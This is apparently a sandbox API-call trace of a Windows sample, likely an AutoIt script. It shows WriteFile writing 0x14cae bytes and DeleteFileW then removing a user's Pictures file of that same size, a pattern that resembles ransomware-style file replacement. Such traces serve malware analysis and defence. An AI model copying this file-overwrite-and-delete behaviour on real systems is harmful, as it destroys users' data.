0x8db2e8 [0188.709] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0188.709] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0188.709] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0188.710] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0188.710] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0188.710] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0188.710] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0188.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0188.710] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0188.710] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0188.710] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0188.710] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0188.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0188.710] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0188.710] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0188.710] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0188.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0188.710] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0188.710] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0188.710] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0188.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0188.710] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0188.710] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0188.710] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0188.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0188.711] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0188.711] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0188.711] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0188.711] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0188.711] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0188.711] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0188.711] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0188.711] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0188.711] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0188.711] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0188.711] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0188.711] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0188.711] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0188.711] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0188.711] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0188.711] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded30 | out: hHeap=0x8a0000) returned 1 [0188.711] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0188.711] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0188.711] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0188.711] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0188.711] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0188.711] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0188.711] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0188.712] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0188.712] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0188.712] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0188.712] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0188.712] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0188.712] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0188.712] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0188.712] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0188.712] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0188.712] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0188.712] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0188.712] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0188.712] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0188.712] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0188.712] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0188.712] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0188.712] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0188.712] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0188.712] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0188.712] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0188.712] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0188.712] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0188.713] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0188.713] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0188.713] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0188.713] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0188.713] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0188.713] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0188.713] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0188.713] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0188.713] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0188.713] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0188.713] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0188.713] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0188.713] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0188.713] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0188.713] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0188.713] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0188.713] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0188.713] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0188.713] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0188.713] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0188.713] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0188.713] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0188.713] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0188.714] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0188.714] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0188.714] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0188.714] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0188.714] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0188.714] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0188.714] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0188.714] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0188.714] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0188.714] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0188.714] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0188.714] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0188.714] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0188.714] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0188.714] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0188.714] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0188.714] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0188.714] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0188.714] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0188.714] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0188.714] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0188.714] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0188.714] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0188.715] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0188.715] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0188.715] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0188.715] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa) returned 0x9bd420 [0188.715] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x9bd420, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WriteFile", lpUsedDefaultChar=0x0) returned 10 [0188.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0188.715] GetProcAddress (hModule=0x75990000, lpProcName="WriteFile") returned 0x759a1282 [0188.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0188.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0188.715] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0188.715] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0188.715] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0188.715] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0188.715] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0188.715] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0188.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0188.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0188.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0188.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0188.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0188.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0188.716] WriteFile (in: hFile=0x160, lpBuffer=0xbca008*, nNumberOfBytesToWrite=0x14cae, lpNumberOfBytesWritten=0x87eae0, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesWritten=0x87eae0*=0x14cae, lpOverlapped=0x0) returned 1 [0188.716] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0188.716] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0188.716] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0188.716] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0188.717] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0188.717] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0188.717] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0188.717] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0188.717] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0188.717] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0188.717] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0188.717] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0188.717] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0188.717] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0188.717] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0188.717] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0188.717] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0188.717] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0188.717] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0188.717] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0188.717] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0188.717] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0188.717] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0188.717] FreeLibrary (hLibModule=0x75990000) returned 1 [0188.717] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0188.717] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0188.718] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0188.718] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0188.718] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0188.718] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0188.718] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0188.718] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0188.718] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0188.718] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0188.718] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.718] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0188.718] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0188.718] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0188.718] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0188.718] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0188.718] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0188.718] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0188.718] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0188.718] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0188.718] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0188.718] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0188.718] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0188.718] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0188.719] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0188.719] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0188.719] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0188.719] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0188.719] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0188.719] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0188.719] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd390 [0188.719] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9bd390, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0188.719] FreeLibrary (hLibModule=0x75990000) returned 1 [0188.719] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0188.719] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0188.719] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0188.719] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0188.719] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0188.722] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0188.722] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0188.722] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.722] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec18 [0188.722] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0188.722] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0188.722] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0188.722] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ggHHL.png", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ggHHL.png", lpFilePart=0x0) returned 0x30 [0188.722] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ggHHL.png", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb40feb0, ftCreationTime.dwHighDateTime=0x1d5e4b2, ftLastAccessTime.dwLowDateTime=0xbb86cd70, ftLastAccessTime.dwHighDateTime=0x1d5de88, ftLastWriteTime.dwLowDateTime=0x15b52d60, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x14cae, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="ggHHL.png", cAlternateFileName="")) returned 0x90ae18 [0188.723] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ggHHL.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gghhl.png")) returned 1 [0188.730] FindNextFileW (in: hFindFile=0x90ae18, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb40feb0, ftCreationTime.dwHighDateTime=0x1d5e4b2, ftLastAccessTime.dwLowDateTime=0xbb86cd70, ftLastAccessTime.dwHighDateTime=0x1d5de88, ftLastWriteTime.dwLowDateTime=0x15b52d60, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x14cae, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="ggHHL.png", cAlternateFileName="")) returned 0 [0188.730] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0188.733] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.734] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0188.734] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de858 [0188.734] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0188.734] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0188.734] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0188.734] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0188.734] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0188.734] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0188.734] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0188.734] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0188.734] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0188.734] 